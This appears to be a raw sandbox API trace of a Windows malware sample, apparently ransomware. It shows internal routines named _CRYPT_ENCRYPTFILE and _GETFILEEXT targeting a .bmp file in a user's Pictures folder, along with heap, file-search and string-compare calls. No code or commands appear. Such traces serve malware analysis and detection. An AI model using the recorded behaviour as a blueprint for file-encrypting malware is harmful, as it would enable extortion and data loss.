returned 12 [0189.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.941] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.941] CloseHandle (hObject=0x158) returned 1 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.941] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.942] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.942] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.942] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0189.943] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.943] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0189.943] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0189.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.943] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.943] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.943] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0xf1e50b30, ftLastWriteTime.dwHighDateTime=0x1d5df13, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 0x90add8 [0189.943] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.944] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0xf1e50b30, ftLastWriteTime.dwHighDateTime=0x1d5df13, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 0x90add8 [0189.944] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.944] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QS5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BgJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gJkU5.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.947] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.947] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.947] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.947] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.948] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.948] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.956] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 1 [0189.957] TranslateMessage (lpMsg=0x87f154) returned 0 [0189.957] DispatchMessageW (lpMsg=0x87f154) returned 0x0 [0189.957] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e7f0) returned 1 [0189.957] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0189.957] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0189.957] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.957] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 